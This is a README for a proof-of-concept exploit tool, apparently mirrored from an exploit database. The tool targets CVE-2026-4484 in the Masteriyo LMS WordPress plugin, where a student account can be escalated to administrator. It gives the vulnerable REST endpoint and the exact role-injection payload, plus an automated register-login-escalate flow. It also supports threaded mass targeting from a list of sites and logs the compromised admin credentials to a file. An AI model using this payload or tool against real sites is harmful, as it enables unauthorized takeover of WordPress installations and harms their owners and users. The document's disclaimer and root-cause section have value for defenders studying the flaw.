Share
## https://sploitus.com/exploit?id=72443FAE-C59B-5FA4-83C8-DEE3333CC07A
# CVE-2026-4484
Masteriyo LMS <= 2.1.6 - Missing Authorization to Authenticated (Student+) Privilege Escalation to Administrator

  



  
  
  
  
  
  
  


---

## ๐Ÿ”ด Vulnerability Overview

### CVE-2026-4484 โ€” Authenticated Privilege Escalation (Student โ†’ Administrator)

| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-4484 |
| **Severity** | **HIGH** โ€” CVSS v3.1 Score: **8.8** |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Affected Software** | Masteriyo LMS Plugin for WordPress |
| **Affected Versions** | All versions up to and including **2.1.6** |
| **Vulnerability Type** | Privilege Escalation (Role Manipulation) |
| **Authentication Required** | Yes โ€” Student-level or above |
| **CWE** | CWE-269: Improper Privilege Management |

**Description:**  
The **Masteriyo LMS** plugin for WordPress is vulnerable to **Privilege Escalation** in all versions up to, and including, **2.1.6**. The vulnerability originates in the `InstructorsController::prepare_object_for_database` function, which fails to properly restrict role assignment during REST API requests. An authenticated attacker with as little as **Student-level access** can craft a specially formed POST request to the Masteriyo REST API endpoint โ€” injecting `"roles": ["administrator"]` into the request payload โ€” to silently elevate their account to WordPress **Administrator**, achieving full site takeover without any administrative interaction.

---

## ๐Ÿ› ๏ธ Tool Description

This is a **Proof-of-Concept (PoC)** exploitation script targeting WordPress installations running a vulnerable version of the **Masteriyo LMS** plugin. The tool supports two attack modes:

| Mode | Name | Flow | Use Case |
|---|---|---|---|
| **1** | `Nx_1` | Register โ†’ Login โ†’ Escalate โ†’ Verify Admin | Fresh attack โ€” no existing account needed |
| **2** | `Nx_2` | Login โ†’ Escalate โ†’ Verify Admin | Existing account available (Student/Instructor) |

### Attack Flow

```
[Register / Login as Student]
         โ†“
[Fetch Dashboard Context โ€” user_id + nonce]
         โ†“
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         โ†“
[Re-login with fresh session]
         โ†“
[Verify /wp-admin access โ†’ confirmed Administrator]
         โ†“
[Write to Login_admin.txt]
```

---

## ๐Ÿ“‹ Requirements

### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS

### Python Dependencies

```bash
pip install requests urllib3 colorama
```

Or via requirements file:

```bash
pip install -r requirements.txt
```

**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
```

---

## ๐Ÿš€ Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py
```

---

## โš™๏ธ Usage

### Basic Run

```bash
python3 CVE-2026-4484.py
```

The tool uses an interactive terminal interface โ€” all parameters are prompted at runtime.

---

### ๐Ÿ—‚๏ธ Target List Format

Create a plain text file (e.g., `list.txt`) with one target per line:

```
https://target1.com
https://target2.com
http://target3.com/wordpress
```

---

### ๐ŸŸฅ Mode 1 โ€” Nx_1 (Register + Login + Escalate)

Use this mode when you have **no existing account** on the target. The tool registers a new student account automatically, then escalates it.

```
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [user@example.com]: user@example.com
Password to use (Nx_1) [Nx_admin]: Nx_admin123!
```

**Steps performed automatically:**
1. GET `/account/signup/` โ†’ extract registration nonce
2. POST `/st/` โ†’ register new account as Student
3. GET `/account/` โ†’ extract login nonce
4. POST `/wp-admin/admin-ajax.php` โ†’ login via Masteriyo AJAX
5. GET `/account/#/dashboard` โ†’ extract `current_user_id` + `nonce`
6. POST `/wp-json/masteriyo/v1/users/instructors/{id}` with `{"roles":["administrator"]}`
7. Re-login with fresh session โ†’ verify admin panel access
8. Write confirmed hits to `Login_admin.txt`

---

### ๐ŸŸฉ Mode 2 โ€” Nx_2 (Login + Escalate โ€” Existing Account)

Use this mode when you already have a valid **Student or Instructor** account on the target.

```
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: student@example.com
Password for that user: mypassword
```

**Steps performed automatically:**
1. GET `/account/` โ†’ extract login nonce
2. POST `/wp-admin/admin-ajax.php` โ†’ login via Masteriyo AJAX
3. GET `/account/#/dashboard` โ†’ extract `current_user_id` + `nonce`
4. POST `/wp-json/masteriyo/v1/users/instructors/{id}` with `{"roles":["administrator"]}`
5. Re-login with fresh session โ†’ verify admin panel access
6. Write confirmed hits to `Login_admin.txt`

---

## ๐Ÿ“ Output Files

| File | Description |
|---|---|
| `Login_admin.txt` | All confirmed administrator escalations |

### Output Format

```
https://target.com/wp-login.php user:student@example.com|pass:Nx_admin123!
```

### Sample Terminal Output

```
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).
```

---

## ๐Ÿ” Technical Details

### Vulnerable Endpoint

```
POST /wp-json/masteriyo/v1/users/instructors/{user_id}
```

### Exploit Payload

```json
{
  "roles": ["administrator"]
}
```

### Required Headers

```
Content-Type: application/json
X-WP-Nonce: 
```

### Root Cause

The `InstructorsController::prepare_object_for_database` function in Masteriyo LMS processes the `roles` parameter from the REST request body without verifying whether the requesting user has the `edit_users` or `promote_users` capability. Any authenticated user (Student-level or above) who can reach this endpoint can submit an arbitrary role value โ€” including `administrator` โ€” which is then persisted directly to the WordPress user metadata table.

---

## ๐Ÿ“ก Contact & Author


  By: Nxploited (Khaled Alenazi)
  
    
  
   
  
    
  


---

## โš ๏ธ Legal Disclaimer

> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - โœ… **Permitted:** Use on systems you own or have been granted explicit written permission to test.
> - โŒ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.

---


  ยฉ 2026 Nxploited (Khaled Alenazi) โ€” For authorized security research only.